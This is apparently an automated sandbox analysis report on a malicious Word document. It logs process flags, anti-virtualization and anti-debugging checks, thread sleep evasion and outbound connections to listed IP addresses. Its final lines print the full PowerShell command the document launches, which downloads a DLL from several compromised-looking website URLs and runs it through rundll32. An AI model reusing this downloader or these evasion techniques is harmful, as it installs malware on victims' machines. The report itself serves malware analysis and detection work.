Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A6672 second address: 00000000615A66A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007FF82C79A621h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000615A8A23 second address: 00000000615A8A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007FF82C79A43Eh 0x00000007 rdtscp

Source: C:\Windows\System32\svchost.exe TID: 6456	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3738			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1230			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

API coverage: 4.0 %

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000005.00000003.312282002.0000000004F7A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000005.00000002.340816682.0000000004A9A000.00000004.00000001.sdmp	Binary or memory string: ,d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: svchost.exe, 00000003.00000002.535889746.0000015127862000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: powershell.exe, 00000005.00000003.337043153.00000000078AD000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000003.00000002.533812198.0000015122029000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.533685658.0000020B61E67000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.533555344.0000023134829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615CD1EE FindFirstFileExA,

14_2_615CD1EE

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6620 mov ecx, dword ptr fs:[00000030h]	14_2_615A6620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A6510 mov eax, dword ptr fs:[00000030h]	14_2_615A6510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B849D mov esi, dword ptr fs:[00000030h]	14_2_615B849D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615C69AA mov eax, dword ptr fs:[00000030h]	14_2_615C69AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615A8A50 mov eax, dword ptr fs:[00000030h]	14_2_615A8A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_0068DE10 mov eax, dword ptr fs:[00000030h]	16_2_0068DE10

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B81F2 IsDebuggerPresent,OutputDebugStringW,

14_2_615B81F2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615B83A7 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,

14_2_615B83A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_615A6620 rdtscp

14_2_615A6620

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5239 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_615B5239
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615B5ABD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615B5ABD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_615BED41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_615BED41

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.79.33.48 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 168.197.250.14 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.178.61.60 187	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
